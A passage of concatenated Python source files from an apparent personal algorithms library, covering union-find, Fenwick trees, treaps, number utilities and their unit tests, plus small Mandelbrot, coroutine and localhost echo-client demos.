self.assertEqual(list(dfs_iterative(4, G, 0)), [0,1,2,3])
self.assertEqual(list(dfs_iterative(4, G, 1)), [1,0,2,3])
self.assertEqual(list(dfs_iterative(4, G, 2)), [2,0,1,3])
self.assertEqual(list(dfs_iterative(4, G, 3)), [3,0,1,2])
def test_topological_sort_basics(self):
n, G = self.n1, make_graph(self.edges1, is_undirected=False)
self.assertEqual(topological_sort(n,G,0), [0,1,3,4,2])
self.assertEqual(topological_sort(n,G,1), [1,3,4,2])
self.assertEqual(topological_sort(n,G,3), [3,4,2])
self.assertEqual(topological_sort(n,G,4), [4,2])
self.assertEqual(topological_sort(n,G,2), [2])
def test_topological_sort_undirected(self):
n, G = self.n1, make_graph(self.edges1, is_undirected=True)
self.assertTrue((topological_sort(n,G,0)==[0,1,3,2,4]) or (topological_sort(n,G,0)==[0,1,3,4,2]))
def test_topological_sort_all_basics(self):
n, G = self.n1, make_graph(self.edges1, is_undirected=False)
self.assertEqual(topological_sort_all(n, G), [[0,1,3,4,2]])
n, G = self.n2, make_graph(self.edges2, is_undirected=False)
self.assertEqual(topological_sort_all(n, G), [[0],[1,2,4,5,3]])
if __name__=="__main__":
unittest.main()
```
#### File: jpylib/jgraphs/_disjointsets.py
```python
class NaiveDisjointSets(object):
def __init__(self, n):
self.parents = [i for i in range(n)]
def union(self, u, v):
u,v = map(self.find, [u,v])
if u==v:
# This is not essential
return
self.parents[v] = u
def find(self, u):
while u != self.parents[u]:
u = self.parents[u]
return u
def components_count(self):
return len([i for i,p in enumerate(self.parents) if i==p])
class OptimizedDisjointSets(object):
def __init__(self, n):
self.parents = [i for i in range(n)]
self.ranks = [1 for i in range(n)]
def union(self, u, v):
# optimization by rank comparison
u,v = map(self.find, [u,v])
if u==v:
# this is essential for rank-adjusting optimization
return
u_rank, v_rank = self.ranks[u], self.ranks[v]
if self.ranks[u] < self.ranks[v]:
u, v = v, u
self.parents[v] = u
self.ranks[u] += self.ranks[v]
def find(self, u):
# optimization by path compression
lineage = []
while self.parents[u] != u:
lineage.append(u)
u = self.parents[u]
root = u
assert not lineage or lineage[-1] != u
for v in lineage:
self.parents[v] = root
return root
def components_count(self):
return len([i for i,p in enumerate(self.parents) if i==p])
StaticDisjointSets = OptimizedDisjointSets
class DynamicDisjointSets(OptimizedDisjointSets):
''' add-union-find data structure.
If the total number of nodes cannot be estimated beforehand,
DynamicDisjointSets is preferable to the StaticDisjointSets kind above '''
def __init__(self):
self.parents = {}
self.ranks = {}
def add(self, u):
assert u not in self.parents
self.parents[u] = u
self.ranks[u] = 1
def has(self, u):
return u in self.parents
def components_count(self):
return len([k for k,p in self.parents.items() if k==p])
import unittest
class DisjointSetsTest(unittest.TestCase):
def setUp(self):
n1, edges1, components1 = 4, [], 4
n2, edges2, components2= 4, [(0,1),(2,1)], 2
n3, edges3, components3 = 4, [(0,1),(3,1),(2,3)], 1
self.test_set = [(n1, edges1, components1), (n2, edges2, components2), (n3, edges3, components3)]
def test_basics(self):
DSs = [NaiveDisjointSets, OptimizedDisjointSets]
for DS in DSs:
for n, edges, expected_components in self.test_set:
dsets = self.make_disjoint_sets(DS, n, edges)
self.assertEqual(dsets.components_count(), expected_components)
def make_disjoint_sets(self, clazz, n, edges):
dsets = clazz(n)
for u,v in edges:
dsets.union(u,v)
return dsets
class DynamicDisjointSetsTest(unittest.TestCase):
def test_find_largest_consecutive_sequence(self):
numbers = [100, 4, 200, 1, 3, 2, 100]
ddsets = DynamicDisjointSets()
ddsets.add(100)
for n in numbers:
if ddsets.has(n):
continue
ddsets.add(n)
if ddsets.has(n-1):
ddsets.union(n-1, n)
if ddsets.has(n+1):
ddsets.union(n, n+1)
max_seq = 0
for i,p in ddsets.parents.items():
if i==p:
max_seq = max(max_seq, ddsets.ranks[i])
self.assertEqual(max_seq, 4)
if __name__ == '__main__':
unittest.main()
```
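As a quick illustration of the usual union-find workflow (separate from the tests above, values chosen for the example), the structure can flag the edge that closes a cycle while scanning an edge list, which is also the core of Kruskal's algorithm:

```python
# assumes OptimizedDisjointSets from the module above is in scope
edges = [(0, 1), (1, 2), (2, 3), (3, 0)]       # the last edge closes a cycle
ds = OptimizedDisjointSets(4)

for u, v in edges:
    if ds.find(u) == ds.find(v):
        print("cycle closed by edge", (u, v))  # -> (3, 0)
    else:
        ds.union(u, v)

print(ds.components_count())                   # -> 1
```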
#### File: jpylib/jmath/_bits.py
```python
from math import inf
def single_bit_ceil(n):
''' @return smallest `1<<m` satisfying `2**m >= n`
Note: 1<<m == 2**m '''
if n==0: return 0
p = 1
while p < n:
p <<= 1
assert p >= n
return p
def single_bit_floor(n):
''' @return largest `1<<m` satisfying `2**m <= n`
Note: 1<<m == 2**m '''
if n==0: return 0
assert n > 0
nxt, cur = n, inf
while 0 < nxt:
cur = nxt
nxt &= nxt-1
assert 0 == nxt < cur <= n
return cur
import unittest
class BitsTest(unittest.TestCase):
def test_single_bit_ceil(self):
self.assertEqual(single_bit_ceil(0), 0)
self.assertEqual(single_bit_ceil(1), 1)
self.assertEqual(single_bit_ceil(2), 2)
self.assertEqual(single_bit_ceil(3), 4)
self.assertEqual(single_bit_ceil(4), 4)
self.assertEqual(single_bit_ceil(5), 8)
self.assertEqual(single_bit_ceil(6), 8)
self.assertEqual(single_bit_ceil(7), 8)
self.assertEqual(single_bit_ceil(8), 8)
def test_single_bit_floor(self):
self.assertEqual(single_bit_floor(0), 0)
self.assertEqual(single_bit_floor(1), 1)
self.assertEqual(single_bit_floor(2), 2)
self.assertEqual(single_bit_floor(3), 2)
self.assertEqual(single_bit_floor(4), 4)
self.assertEqual(single_bit_floor(5), 4)
self.assertEqual(single_bit_floor(6), 4)
self.assertEqual(single_bit_floor(7), 4)
self.assertEqual(single_bit_floor(8), 8)
if __name__ == "__main__":
unittest.main()
```
#### File: jpylib/jmath/_factors.py
```python
def divisor_factors(n):
''' return [divisor]
i.e. 1 -> [1]
2 -> [1,2]
4 -> [1,2,4]
10 -> [1,2,5,10] '''
left, right = [], []
for f in range(1, int(n**.5)+1):
if n%f == 0:
l, r = f, n//f
left.append(l)
if l != r: right.append(r)
while right:
left.append(right.pop(-1))
#assert right == []
return left
def prime_factors(n):
''' return [prime_factor]
i.e. 4 -> [2,2]
6 -> [2,3]
7 -> [7]
9 -> [3,3]
12 -> [2,2,3] '''
assert n >= 1
factors = []
while n%2==0:
factors.append(2)
n //= 2
p = 3
while n > 1:
while n % p == 0:
factors.append(p)
n //= p
p += 2
assert n == 1
return factors
def gcd(a, b):
if b==0: return a
return gcd(b, a%b)
def lcm(a,b):
return a * b // gcd(a,b)
import unittest
class FactorsTest(unittest.TestCase):
def test_divisor_factors(self):
self.assertEqual(divisor_factors(1), [1])
self.assertEqual(divisor_factors(2), [1,2])
self.assertEqual(divisor_factors(4), [1,2,4])
self.assertEqual(divisor_factors(10), [1,2,5,10])
def test_prime_factors(self):
self.assertEqual(prime_factors(1), [])
self.assertEqual(prime_factors(2), [2])
self.assertEqual(prime_factors(4), [2,2])
self.assertEqual(prime_factors(6), [2,3])
self.assertEqual(prime_factors(7), [7])
self.assertEqual(prime_factors(9), [3,3])
self.assertEqual(prime_factors(12), [2,2,3])
class GCDTest(unittest.TestCase):
def test_basics(self):
self.assertEqual(gcd(1,1), 1)
self.assertEqual(gcd(1,3), 1)
self.assertEqual(gcd(3,1), 1)
self.assertEqual(gcd(3,7), 1)
self.assertEqual(gcd(2,2), 2)
self.assertEqual(gcd(2,4), 2)
self.assertEqual(gcd(55,11), 11)
class LCMTest(unittest.TestCase):
def test_basics(self):
self.assertEqual(lcm(1,1), 1)
self.assertEqual(lcm(1,3), 3)
self.assertEqual(lcm(3,1), 3)
self.assertEqual(lcm(3,7), 21)
self.assertEqual(lcm(2,2), 2)
self.assertEqual(lcm(2,4), 4)
self.assertEqual(lcm(55,11), 55)
if __name__ == "__main__":
unittest.main()
```
#### File: jpylib/jmath/_int.py
```python
def len_int(n):
''' @param n: number::int
@return number of digit count '''
assert n >= 0
digits = 0
while n > 0:
digits += 1
n //= 10
return digits
import unittest
class LenTest(unittest.TestCase):
def test_len_int(self):
with self.assertRaises(AssertionError):
len_int(-1)
self.assertEqual(len_int(0), 0)
self.assertEqual(len_int(1), 1)
self.assertEqual(len_int(10), 2)
self.assertEqual(len_int(99), 2)
self.assertEqual(len_int(555), 3)
if __name__ == "__main__":
unittest.main()
```
#### File: jpylib/jtests/_tests.py
```python
def parse_io(inp, out):
''' io means input/output for testcases;
It splitlines them and strip the elements
@param inp: multi-lined str
@param out: multi-lined str
@return (inp::[str], out::[str]) '''
inp = [i.strip() for i in inp.splitlines() if i.strip()]
out = [o.strip() for o in out.splitlines() if o.strip()]
return inp, out
def joiner(iterable, sep=' '):
''' @return e.g. [1, 2] -> "1 2" '''
return sep.join(map(str, iterable))
def strips(doc):
''' @return strip each line of doc '''
return '\n'.join(line.strip() for line in doc.splitlines())
def lstrips(doc):
''' @return lstrip each line of doc '''
return '\n'.join(line.lstrip() for line in doc.splitlines())
def rstrips(doc):
''' @return rstrip each line of doc '''
return '\n'.join(line.rstrip() for line in doc.splitlines())
```
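A small usage sketch (values picked for illustration) showing how these helpers normalize multi-line testcase fixtures:

```python
# assumes parse_io and joiner from the module above are in scope
inp, out = parse_io("""
    3
    1 2 3
""", """
    6
""")
print(inp)                      # ['3', '1 2 3']
print(out)                      # ['6']
print(joiner([1, 2, 3]))        # 1 2 3
print(joiner([1, 2, 3], ','))   # 1,2,3
```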
#### File: jpylib/jtrees/_fenwicktree.py
```python
class FenwickTree(object):
''' a.k.a. Binary Indexed Tree '''
def __init__(self, sz):
self.sz = sz + 1 # add dummy head
self.tree = [0] * self.sz
def add_all(self, vals):
for pos, val in enumerate(vals):
self.add(pos, val)
def add(self, pos, val):
''' @param pos: 0-based
@param val '''
pos += 1 # 1-based
while pos < self.sz:
self.tree[pos] += val
pos += (pos & -pos)
def partial_sum(self, pos):
''' @param pos: 0-based
@return sum of A[0...pos] '''
if pos < 0: return 0
assert 0 <= pos < self.sz-1
pos += 1 # 1-based
psum = 0
while pos > 0:
psum += self.tree[pos]
pos &= pos-1
return psum
def range_sum(self, from0, to0):
''' both inclusive, both 0-based '''
assert 0 <= from0 <= to0 < self.sz # 0-based
return self.partial_sum(to0) - self.partial_sum(from0 - 1)
import unittest
def naive_sum(arr, l, r):
return sum(arr[l:r+1])
class FenwickTreeTest(unittest.TestCase):
def test_range_sum(self):
arr = [5,2,1,4,3]
sz = len(arr)
fenwick = FenwickTree(sz)
fenwick.add_all(arr)
# explicit cases
self.assertEqual(fenwick.range_sum(0,0), 5)
self.assertEqual(fenwick.range_sum(0,1), 7)
self.assertEqual(fenwick.range_sum(0,4), 15)
def test_range_sum_all(self):
arr = [5,2,1,4,3]
sz = len(arr)
fenwick = FenwickTree(sz)
fenwick.add_all(arr)
# all cases
for l in range(sz):
for r in range(l, sz):
self.assertEqual(fenwick.range_sum(l,r), naive_sum(arr,l,r))
if __name__ == "__main__":
unittest.main()
```
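To make the index arithmetic above concrete: `pos & -pos` isolates the lowest set bit, so `add` climbs to the next responsible node, while `partial_sum` strips one low bit per step via `pos &= pos - 1`. A short trace, reusing the same 5-element array as the tests:

```python
# assumes FenwickTree from the module above is in scope
arr = [5, 2, 1, 4, 3]
fw = FenwickTree(len(arr))
fw.add_all(arr)

# partial_sum(3) works on 1-based index 4, whose node covers arr[0..3], then 4 & 3 == 0 stops the loop
print(fw.partial_sum(3))        # -> 12
print(fw.range_sum(1, 3))       # -> 2 + 1 + 4 = 7
```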
#### File: jpylib/jtrees/_tests.py
```python
from ._tree_traversers import traverse_pre_order, traverse_in_order
from queue import Queue
from math import inf
def assertEqualTreeTopologies(tree, nodes_in_preorder, nodes_in_inorder):
''' this tree topology comparison works only with tree with unique values '''
actual_nodes_in_preorder = list(n.val for n in traverse_pre_order(tree))
assert len(actual_nodes_in_preorder) == len(set(actual_nodes_in_preorder)), 'all values on the tree should be unique'
assert actual_nodes_in_preorder == nodes_in_preorder, 'pre-order should be the same {} == {}'.format(actual_nodes_in_preorder, nodes_in_preorder)
actual_nodes_in_inorder = list(n.val for n in traverse_in_order(tree))
assert actual_nodes_in_inorder == nodes_in_inorder, 'in-order should be the same {} == {}'.format(actual_nodes_in_inorder, nodes_in_inorder)
def is_full_tree_bfs(tree):
def all_has_both_children(nodes):
assert nodes
for node in nodes:
if not node.left:
return False
if not node.right:
return False
return True
def none_has_any_children(nodes):
for node in nodes:
if node.left:
return False
if node.right:
return False
return True
def get_children(nodes):
'''
returns a list of children nodes
ex) [n1, n2, ...]
'''
res = []
for node in nodes:
res.append(node.left)
res.append(node.right)
return res
assert tree
q = Queue()
#level = 0
root_level = [tree]
q.put(root_level)
while not q.empty():
nodes = q.get()
if all_has_both_children(nodes):
all_children = get_children(nodes)
q.put(all_children)
continue
elif none_has_any_children(nodes):
return True
else:
return False
assert False
def is_full_tree(node):
''' @param node
@return True if all nil nodes are at the same level '''
def _is_full_tree(node, lv, nil_lv):
if not node:
if not nil_lv:
nil_lv.append(lv)
return True
else:
return nil_lv[0] == lv
assert node
if not _is_full_tree(node.left, lv+1, nil_lv):
return False
if not _is_full_tree(node.right, lv+1, nil_lv):
return False
return True
return _is_full_tree(node, 0, [])
def is_complete_tree(node):
def _is_complete_tree(node, lv, nil_lv):
if not node:
if not nil_lv:
nil_lv.append(lv)
return True
else:
#assert 1 <= len(nil_lv) <= 2
if len(nil_lv) == 1:
lv0 = nil_lv[0]
if lv0 == lv:
return True
if lv0 == lv+1:
nil_lv.append(lv)
return True
else:
return False
else:
_, lv1 = nil_lv
return lv1 == lv
if not _is_complete_tree(node.left, lv+1, nil_lv):
return False
if not _is_complete_tree(node.right, lv+1, nil_lv):
return False
return True
return _is_complete_tree(node, 0, [])
def is_bst1(node, left_boundary=-inf, right_boundary=inf):
if not node: return True
if not left_boundary < node.val <= right_boundary:
return False
return is_bst1(node.left, left_boundary, node.val) \
and is_bst1(node.right, node.val, right_boundary)
def is_bst2(node):
''' Space Complexity (except stackframe): O(n) '''
vals = list(n.val for n in traverse_in_order(node))
for a,b in zip(vals, vals[1:]):
if not a<=b:
return False
return True
def is_bst3(node):
''' Space Complexity (except stackframe): O(1) '''
from collections import deque
if not node:
return True
q = deque()
it = traverse_in_order(node)
for _ in range(2):
try:
q.append(next(it))
except:
return True
while len(q) == 2:
if not q[0].val <= q[1].val:
return False
q.popleft()
try:
next_val = next(it)
q.append(next_val)
except StopIteration:
pass
return True
is_bst = is_bst1
import unittest
from ._nodes import tree_builder
from .tree_samples import tree_full_1to3, tree_full_1to7, tree_full_1to15, \
tree_compelete_1to6, tree_no_complete2, tree_no_complete4, \
bst_true1, bst_true2, bst_true3, bst_true4, bst_true5, bst_true6, \
bst_false1, bst_false2
class IsFullTreeTest(unittest.TestCase):
def test_is_full_tree_bfs1(self):
self.assertTrue(is_full_tree_bfs(tree_full_1to3))
self.assertTrue(is_full_tree_bfs(tree_full_1to7))
self.assertTrue(is_full_tree_bfs(tree_full_1to15))
self.assertFalse(is_full_tree_bfs(tree_no_complete2))
self.assertFalse(is_full_tree_bfs(tree_no_complete4))
def test_is_full_tree(self):
self.assertTrue(is_full_tree(tree_full_1to3))
self.assertTrue(is_full_tree(tree_full_1to7))
self.assertTrue(is_full_tree(tree_full_1to15))
self.assertFalse(is_full_tree(tree_builder([1,2])))
self.assertFalse(is_full_tree(tree_compelete_1to6))
class IsCompleteTree(unittest.TestCase):
def test_is_complete_tree(self):
self.assertTrue(is_complete_tree(tree_builder([])))
self.assertTrue(is_complete_tree(tree_builder([1])))
self.assertTrue(is_complete_tree(tree_builder([1,2])))
self.assertTrue(is_complete_tree(tree_builder([1,2,3,4])))
self.assertTrue(is_complete_tree(tree_builder([1,2,3,4,5])))
self.assertTrue(is_complete_tree(tree_compelete_1to6))
self.assertTrue(is_complete_tree(tree_full_1to7))
self.assertFalse(is_complete_tree(tree_builder([1,None,3])))
self.assertFalse(is_complete_tree(tree_builder([1,2,3,4,None,6,7])))
self.assertFalse(is_complete_tree(tree_no_complete2))
self.assertFalse(is_complete_tree(tree_no_complete4))
class IsBinarySearchTreeTest(unittest.TestCase):
def test_basics(self):
methods_on_test = [is_bst1, is_bst2, is_bst3]
for method in methods_on_test:
self.assertTrue(method(bst_true1))
self.assertTrue(method(bst_true2))
self.assertTrue(method(bst_true3))
self.assertTrue(method(bst_true4))
self.assertTrue(method(bst_true5))
self.assertTrue(method(bst_true6))
self.assertTrue(method(tree_builder([4,2,6,2,4])))
self.assertFalse(method(bst_false1))
self.assertFalse(method(bst_false2))
self.assertFalse(method(tree_builder([4,2,6,1,5])))
if __name__=='__main__':
unittest.main()
```
#### File: jpylib/jtrees/_treap.py
```python
from ._nodes import TreeNode
from random import random, randint, shuffle
import sys
sys.setrecursionlimit(10000)
class TreapNode(TreeNode):
def __init__(self, val, priority):
super().__init__(val)
self.priority = priority
self.size = 1
def set_left(self, left):
self.left = left
self.resize()
return self
def set_right(self, right):
self.right = right
self.resize()
return self
def resize(self):
self.size = 1
if self.left:
self.size += self.left.size
if self.right:
self.size += self.right.size
def insert(root, node, key=lambda n: n):
''' @return current node '''
if not root: return node
if root.priority < node.priority:
lhs, rhs = split(root, node, key)
node.set_left(lhs)
node.set_right(rhs)
return node
elif key(root.val) < key(node.val):
return root.set_right(insert(root.right, node, key))
else:
return root.set_left(insert(root.left, node, key))
def split(node, pivot_node, key=lambda n: n):
''' @return (left, right) '''
if not node:
return (None, None)
if key(node.val) <= key(pivot_node.val): #todo: rather <= than <
lhs, rhs = split(node.right, pivot_node, key)
node.set_right(lhs)
return (node, rhs)
else:
lhs, rhs = split(node.left, pivot_node, key)
node.set_left(rhs)
return (lhs, node)
def delete(node, val):
''' Note: User should not call this method unless self is root of the treap
@return current node '''
if not node:
return None
if node.val == val:
return merge(node.left, node.right)
elif node.val < val:
return node.set_right(delete(node.right, val))
elif node.val > val:
return node.set_left(delete(node.left, val))
return node
def merge(left, right):
if not left: return right
if not right: return left
if left.priority >= right.priority: #todo: rather > than >=. test this with duplicate values
return left.set_right(merge(left.right, right))
else:
return right.set_left(merge(left, right.left))
def find(node, val, key=lambda n: n):
if not node: return None
if key(node.val) == val:
return node
elif key(node.val) < val:
return find(node.right, val, key)
else:
return find(node.left, val, key)
def get_size(root):
return root.size if root else 0
def get_priority(root):
return root.priority if root else 0
def kth(root, k):
if k < 0 or not root: return None
if root.size <= k: return None
left_sz = get_size(root.left)
if left_sz > k:
return kth(root.left, k)
elif left_sz == k:
return root
else:
return kth(root.right, k-1-left_sz)
def split_first_k(root, k):
if not root: return (None, None)
#if k <= 0: return (None, root) #auxiliary for efficiency
#if root.size <= k: return (root, None) #auxiliary efficiency
left_size = get_size(root.left)
if left_size >= k:
ll, lr = split_first_k(root.left, k)
root.set_left(lr)
return (ll, root)
else:
rl,rr = split_first_k(root.right, k-1-left_size)
root.set_right(rl)
return (root, rr)
def insert_at(root, k, node):
''' this operation can leave the treap skewed
when called in particular orders, because it bypasses the `priority` invariant.
Use it with caution, or better yet, consider AVL, RBT, etc.
@return the new root '''
if not root:
return node
assert root
if k < 0: k = 0
if k > root.size: k = root.size
left_size = get_size(root.left)
if left_size > k:
return root.set_left(insert_at(root.left, k, node))
elif left_size == k:
l = root.left
root.set_left(None)
node.set_left(l)
node.set_right(root)
node.priority = max(map(get_priority, [node.left, node.right]))
return node
else:
return root.set_right(insert_at(root.right, k-1-left_size, node))
def delete_at(root, k):
''' return new root after deleting kth node
@param k: 0-based '''
if not root: return None
if k < 0: k = 0
if k >= root.size: k = root.size-1
assert k in range(root.size)
left_size = get_size(root.left)
if left_size > k:
return root.set_left(delete_at(root.left, k))
elif left_size == k:
return merge(root.left, root.right)
else:
return root.set_right(delete_at(root.right, k-1-left_size))
class Treap(object):
''' wrapper class for easier usage for treapnode '''
def __init__(self):
self.root = None
def size(self):
return 0 if not self.root else self.root.size
def insert_val(self, val, priority=None, key=lambda n: n):
node = TreapNode(val, random()) if priority == None else TreapNode(val, priority)
if not self.root:
self.root = node
else:
self.root = insert(self.root, node, key)
return self
def delete_val(self, val):
self.root = delete(self.root, val)
return self
def find(self, val, key=lambda n: n):
return find(self.root, val, key)
def kth(self, k):
''' @param k: 0-based
@return TreapNode if exists, None otherwise '''
if not self.root: return None
return kth(self.root, k)
def rotate_left(self, k):
''' @param k: negative k means rotate_right '''
if not self.root: return None
k %= self.root.size
l,r = split_first_k(self.root, k)
self.root = merge(r, l)
return self
def rotate_right(self, k):
return self.rotate_left(-k)
def insert_at(self, k, val, priority=None):
self.root = insert_at(self.root, k, TreapNode(val, random() if priority==None else priority))
return self
def delete_at(self, k):
self.root = delete_at(self.root, k)
return self
import unittest
from math import inf, log
from ._tests import assertEqualTreeTopologies, is_bst
from ._tree_traversers import traverse_in_order
class TreapTestCase(unittest.TestCase):
def assertSizeValid(self, root):
self.assertTrue(self.is_size_valid(root))
def is_size_valid(self, root):
if not root: return True
if not self.is_size_valid(root.left) or \
not self.is_size_valid(root.right):
return False
if not root.size == 1 + get_size(root.left) + get_size(root.right):
return False
return True
def assertBSTValid(self, root):
self.assertTrue(self.is_bst_valid(root))
def is_bst_valid(self, root):
return is_bst(root)
def assertPriorityValid(self, root):
self.assertTrue(self.is_priority_valid(root))
def is_priority_valid(self, root):
if not root: return True
if not self.is_priority_valid(root.left):
return False
if not self.is_priority_valid(root.right):
return False
if not get_priority(root.left) <= root.priority or \
not get_priority(root.right) <= root.priority:
return False
return True
def assertBSTreap(self, root):
''' Binary Search Treap '''
self.assertSizeValid(root)
self.assertBSTValid(root)
self.assertPriorityValid(root)
def assertHeightAlmostLog(self, root):
expected_height = log(root.size, 1.5)
#expected_height = log(root.size, 1.33) # by experiments
actual_height = self.tree_height(root)
self.assertAlmostEqual(expected_height, actual_height, delta=expected_height*0.8)
#self.assertAlmostEqual(expected_height, actual_height, delta=expected_height*0.2) # by experiments
#todo: extract this method into a module
def tree_height(self, root):
if not root: return -1
return 1 + max(map(self.tree_height, [root.left, root.right]))
def make_shuffled_treap(self, values):
shuffle(values)
treap = Treap()
for v in values:
treap.insert_val(v)
return treap
class TreapBasicTest(TreapTestCase):
def setUp(self):
self.treap0 = Treap()
self.treap1 = Treap().insert_val(1, 1)
self.treap2 = Treap().insert_val(1, 1).insert_val(0,0)
self.treap3 = Treap().insert_val(1, 1).insert_val(0,0).insert_val(2,0)
self.treap4 = Treap().insert_val(1, 1).insert_val(0,0).insert_val(2,0).insert_val(3, 0.5)
def test_add_and_size(self):
self.assertEqual(self.treap0.root, None)
self.assertEqual(self.treap0.size(), 0)
assertEqualTreeTopologies(self.treap1.root, [1], [1])
self.assertEqual(self.treap1.size(), 1)
assertEqualTreeTopologies(self.treap2.root, [1,0], [0,1])
self.assertEqual(self.treap2.size(), 2)
assertEqualTreeTopologies(self.treap3.root, [1,0,2], [0,1,2])
self.assertEqual(self.treap3.size(), 3)
assertEqualTreeTopologies(self.treap4.root, [1,0,3,2], [0,1,2,3])
self.assertEqual(self.treap4.size(), 4)
def test_delete(self):
self.treap0.delete_val(1)
self.assertEqual(self.treap1.delete_val(1).delete_val(1).size(), 0)
self.assertEqual(self.treap4.delete_val(1).delete_val(3).size(), 2)
def test_find(self):
self.assertTrue(self.treap4.find(2))
self.assertFalse(self.treap4.find(99))
class TreapInsertUserDefinedType(unittest.TestCase):
def test_basics(self):
class Employee(object):
def __init__(self, name, age):
self.name = name
self.age = age
@classmethod
def key(cls, emp):
return (emp.age, emp.name)
treap = Treap()
treap.insert_val(Employee('jin', 33), 1, Employee.key)
treap.insert_val(Employee('min', 30), 2, Employee.key)
ages_in_order = list(n.val.age for n in traverse_in_order(treap.root))
self.assertEqual(ages_in_order, [30,33])
self.assertEqual(treap.root.val.name, 'min')
self.assertEqual(treap.root.right.val.name, 'jin')
self.assertTrue(treap.find((33, 'jin'), Employee.key))
self.assertFalse(treap.find((-1, 'no_exist'), Employee.key))
class TreapDuplicateTest(TreapTestCase):
def test_basics(self):
treap = Treap()
treap.insert_val(1, 1).insert_val(2, 0.5)
treap.insert_val(2, 0.75)
self.assertBSTreap(treap.root)
self.assertEqual(treap.root.size, 3)
class TreapComplexTest(TreapTestCase):
def test_fuzz1(self):
mini, maxi, tree_size = 0, 1<<30, 10000
treap = Treap()
for _ in range(tree_size):
treap.insert_val(randint(mini, maxi))
self.assertEqual(treap.size(), tree_size)
self.assertBSTreap(treap.root)
self.assertHeightAlmostLog(treap.root)
#print('fuzz1: ', treap.root.left.size, treap.root.right.size)
def test_fuzz2(self):
tree_size = 10000
treap = Treap()
for i in range(tree_size):
treap.insert_val(i)
self.assertEqual(treap.size(), tree_size)
self.assertBSTreap(treap.root)
self.assertHeightAlmostLog(treap.root)
#print('fuzz2: ', treap.root.left.size, treap.root.right.size)
def test_fuzz3(self):
values = list(range(10000))
treap = self.make_shuffled_treap(values)
shuffle(values)
treap = Treap()
for v in values:
treap.insert_val(v)
shuffle(values)
for v in values[:5000]:
treap.delete_val(v)
self.assertEqual(treap.size(), 5000)
self.assertBSTreap(treap.root)
self.assertHeightAlmostLog(treap.root)
class KTest(TreapTestCase):
def test_kth_basics(self):
treap = self.make_shuffled_treap(list(range(10000)))
for k in [0,1,77,777,7777,9999]:
self.assertEqual(treap.kth(k).val, k)
for k in [10000, 10001, 987654321]:
self.assertFalse(treap.kth(k))
treap.delete_val(0)
self.assertEqual(treap.kth(0).val, 1)
self.assertEqual(treap.kth(99).val, 100)
treap.delete_val(50)
self.assertEqual(treap.kth(99).val, 101)
def test_split_first_k(self):
#within boundary
for k in range(0, 11):
treap = self.make_shuffled_treap(list(range(10)))
l,r = split_first_k(treap.root, k)
self.assertEqual(get_size(l), k)
self.assertEqual(get_size(r), 10-k)
self.assertBSTreap(l)
self.assertBSTreap(r)
#out of boundary
treap = self.make_shuffled_treap(list(range(10)))
l,r = split_first_k(treap.root, -99)
self.assertEqual(get_size(l), 0)
self.assertEqual(get_size(r), 10)
self.assertBSTreap(l)
self.assertBSTreap(r)
treap = self.make_shuffled_treap(list(range(10)))
l,r = split_first_k(treap.root, 99)
self.assertEqual(get_size(l), 10)
self.assertEqual(get_size(r), 0)
self.assertBSTreap(l)
self.assertBSTreap(r)
class RotateTest(TreapTestCase):
def test_basics(self):
treap = self.make_shuffled_treap(list(range(10)))
treap.rotate_left(0)
self.assertEqual(treap.root.size, 10)
self.assertBSTreap(treap.root)
treap.rotate_left(1)
self.assertEqual(treap.root.size, 10)
self.assertEqual(treap.kth(0).val, 1)
self.assertEqual(treap.kth(8).val, 9)
self.assertEqual(treap.kth(9).val, 0)
self.assertSizeValid(treap.root)
self.assertPriorityValid(treap.root)
with self.assertRaises(AssertionError):
self.assertBSTValid(treap.root)
treap.rotate_left(3).rotate_left(3).rotate_left(3).rotate_right(3).rotate_left(3)
self.assertBSTreap(treap.root)
class InsertAtAndDeleteAtTest(TreapTestCase):
def test_insert_at(self):
from itertools import chain
for k in range(5):
treap = self.make_shuffled_treap(list(range(5)))
treap.insert_at(k, 9999)
self.assertEqual(treap.kth(k).val, 9999)
self.assertEqual(treap.root.size, 6)
self.assertSizeValid(treap.root)
self.assertPriorityValid(treap.root)
with self.assertRaises(AssertionError):
self.assertBSTValid(treap.root)
for v,k in enumerate(chain(range(k), range(k+1, 6))):
self.assertEqual(treap.kth(k).val, v)
def test_delete_at(self):
treap = self.make_shuffled_treap(list(range(5)))
treap.delete_at(0)
self.assertEqual(treap.kth(0).val, 1)
treap.delete_at(3)
self.assertEqual(treap.kth(2).val, 3)
self.assertFalse(treap.kth(2).right)
treap.delete_at(0).delete_at(0)
self.assertFalse(treap.kth(0).left)
self.assertFalse(treap.kth(0).right)
self.assertEqual(treap.kth(0).val, 3)
treap.delete_at(0)
self.assertFalse(treap.root)
if __name__ == "__main__":
unittest.main()
```
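A brief sketch (separate from the tests above, values chosen for illustration) of the wrapper's order-statistics use: kth lookup and positional deletion on a small treap:

```python
# assumes Treap from the module above is in scope
treap = Treap()
for v in [30, 10, 50, 20, 40]:
    treap.insert_val(v)

print(treap.kth(0).val)    # -> 10  (smallest)
print(treap.kth(2).val)    # -> 30  (median)

treap.delete_at(0)         # drop the current smallest
print(treap.kth(0).val)    # -> 20
```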
#### File: languages/figuredrawer/mandelbrot.py
```python
from PIL import Image, ImageDraw
SIZE = 256
image = Image.new("L", (SIZE, SIZE))
d = ImageDraw.Draw(image)
def mandel(c):
z = 0
for h in range(20):
z = z ** 2 + c
if abs(z) > 2:
break
return abs(z) < 2
for x in range(SIZE):
r = x / 110.0 - 1.6
for y in range(SIZE):
i = y / 110.0 - 1.2
d.point((x,y), mandel(complex(r, i)) * 255)
image.save('./mandelbrot.jpg')
```
#### File: python/coroutine/coroutine.py
```python
def test(i):
print("coroutine starts")
while True:
value = yield i
i += value
b = test(5) # just created; main fn in control;
next(b) # now the coroutine is in control:
# it executes the print statement and then
# yields val `i` to the main fn,
# yielding control back to the caller and
# waiting to be fed again in pending mode
b.send(3) # main fn feeds this coroutine with val `3`;
# brought back to life and in control again, it
# executes i += value, then yields the updated `i` back to the main fn
b.send(5) # main fn feeds this coroutine with val `5`;
# brought back to life and in control again, it
# executes i += value, then yields the updated `i` back to the main fn
```
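For reference, a sketch of the same session with the yielded values captured, which makes the hand-off explicit (the printed numbers follow from `i` starting at 5):

```python
def test(i):
    print("coroutine starts")
    while True:
        value = yield i
        i += value

b = test(5)
print(next(b))     # prints "coroutine starts", then yields 5
print(b.send(3))   # i becomes 8, yields 8
print(b.send(5))   # i becomes 13, yields 13
```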
#### File: python/networking/echo_client.py
```python
import socket
import threading as t
from time import sleep
server, port = 'localhost', 50000
def sender_bot(_id):
msgs = ['hello, I am bot_{x}'.format(x=_id),
